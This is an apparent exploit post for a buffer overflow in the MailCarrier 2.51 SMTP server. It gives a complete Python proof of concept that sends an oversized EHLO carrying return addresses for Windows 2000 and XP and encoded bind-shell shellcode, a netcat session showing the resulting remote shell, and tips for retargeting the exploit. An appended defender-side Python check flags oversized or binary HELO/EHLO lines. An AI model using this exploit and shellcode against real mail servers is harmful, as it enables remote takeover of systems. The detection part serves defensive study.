MailCarrier 2.51 SMTP server Buffer Overflow

Source: www.hk20.com

ABOUT :
MailCarrier is a full-featured mail server with the latest security and anti-spam
functions. It supports SSL communication and SMTP/POP3 authentication methods based on
SASL and NTLM that do not transmit the message and/or password in clear text. Many spam mails
can be blocked through lookup of the sender's address, RBL lookups, filtering of
message content, and so on.

MailCarrier provides various methods for running multiple domains. It can execute
one mail server instance per domain on a single computer, so you can run many mail servers
without them interfering with each other. In addition, you can create as many virtual domains and alias
domains per mail server instance as you want. For each domain and instance, you can define an
individual spam policy and security policy.

http://www.tabslab.com/en/product/mailcarrier20/

THE POC :
#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow     #
# Advanced, secure and easy to use FTP Server.          #
# 23 Oct 2004 - muts                                    #
#########################################################
# D:\BO>mailcarrier-2.5-EHLO.py                         #
#########################################################
# D:\data\tools>nc -v 192.168.1.32 101                  #
# localhost [127.0.0.1] 101 (hostname) open             #
# Microsoft Windows 2000 [Version 5.00.2195]            #
# (C) Copyright 1985-2000 Microsoft Corp.               #
# C:\WINNT\system32>                                    #
#########################################################

# Python 2 script (print statements, str-based socket I/O).
import struct
import socket

print "\n\n###############################################"
print "\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!\n"
print "\n\n###############################################"

def make_overflow_dummy(overflow_len, retaddr):
   # overflow_len bytes of filler, then the return address packed little-endian
   return 'A' * overflow_len + struct.pack('<L', retaddr)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Payload: bind shell on port 101 (see the nc session in the header)
sc2 = "\xEB"
sc2 += "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
sc2 += "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
sc2 += "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
sc2 += "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
sc2 += "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
sc2 += "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
sc2 += "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
sc2 += "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
sc2 += "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
sc2 += "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
sc2 += "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
sc2 += "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
sc2 += "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
sc2 += "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
sc2 += "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
sc2 += "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
sc2 += "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
sc2 += "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
sc2 += "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
sc2 += "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
sc2 += "\x58\x68\x61\x63\x6B\x90"

# Change RET address as need be.
#buffer = make_overflow_dummy(5093, 0x7c2ee21b) + '\x90' * 32 + sc2  # RET Win2000 SP4 ENG
buffer = make_overflow_dummy(5097, 0x7d17dd13) + '\x41' * 32 + sc2  # RET WinXP SP2 ENG

try:
      print "\nSending evil buffer..."
      s.connect(('127.0.0.1', 25))
      s.send('EHLO ' + buffer + '\r\n')
      data = s.recv(1024)
      s.close()
      print "\nDone! Try connecting to port 101 on victim machine."
except socket.error:
      print "Could not connect to SMTP!"

INFOS :

It works as is, but you might want to change the part after EIP to NOPs in the
following way, just for aesthetics' sake (note the '\x90' bytes in place of the '\x41' filler):

buffer = make_overflow_dummy(5097, 0x7d17dd13) + '\x90' * 32 + sc2  # RET WinXP SP2 ENG
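As an added, defender-side example (not from the original post, muts, or MailCarrier): a Python 3 check that flags HELO/EHLO command lines shaped like the request above, using the RFC 5321 length limits; the sample session lines and the 0xdeadbeef placeholder bytes are constructed.

```python
import re

# RFC 5321 section 4.5.3.1: a domain is at most 255 octets and a command
# line (including CRLF) at most 512 octets.
MAX_DOMAIN_LEN = 255
MAX_COMMAND_LINE_LEN = 512

# HELO/EHLO followed by one argument; matched on bytes so that binary
# payload data does not break the parse.
_GREETING_RE = re.compile(rb'^(HELO|EHLO)[ \t]+(.*?)\r?\n?$',
                          re.IGNORECASE | re.DOTALL)


def inspect_greeting(line):
    """Return a list of findings for one raw SMTP command line (bytes).

    An empty list means the line is a normal-looking HELO/EHLO or is some
    other command, which this check ignores.
    """
    m = _GREETING_RE.match(line)
    if not m:
        return []
    verb, arg = m.group(1).upper().decode(), m.group(2)
    findings = []
    if len(line) > MAX_COMMAND_LINE_LEN:
        findings.append('%s line is %d octets (RFC 5321 max %d)'
                        % (verb, len(line), MAX_COMMAND_LINE_LEN))
    if len(arg) > MAX_DOMAIN_LEN:
        findings.append('%s argument is %d octets (RFC 5321 max %d)'
                        % (verb, len(arg), MAX_DOMAIN_LEN))
    # A domain name is printable ASCII; control or high bytes mean a
    # binary payload (such as a return address or shellcode) is present.
    if any(b < 0x20 or b > 0x7e for b in arg):
        findings.append('%s argument contains non-printable bytes' % verb)
    # A long run of one byte is the classic overflow filler / NOP sled.
    run = re.search(rb'(.)\1{255,}', arg, re.DOTALL)
    if run:
        findings.append('%s argument has a %d-byte run of 0x%02x'
                        % (verb, len(run.group(0)), run.group(1)[0]))
    return findings


# Constructed sample session: benign greeting, MAIL command, and a greeting
# shaped like the PoC (5097 filler bytes, placeholder address, NOP sled).
SAMPLE_LINES = [
    b'EHLO mail.example.test\r\n',
    b'MAIL FROM:<alice@example.test>\r\n',
    b'EHLO ' + b'A' * 5097 + b'\xde\xad\xbe\xef' + b'\x90' * 32 + b'\r\n',
]

if __name__ == '__main__':
    for sample in SAMPLE_LINES:
        for finding in inspect_greeting(sample):
            print(finding)
```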







Regards to muts & the whitehat's folks

Jerome ATHIAS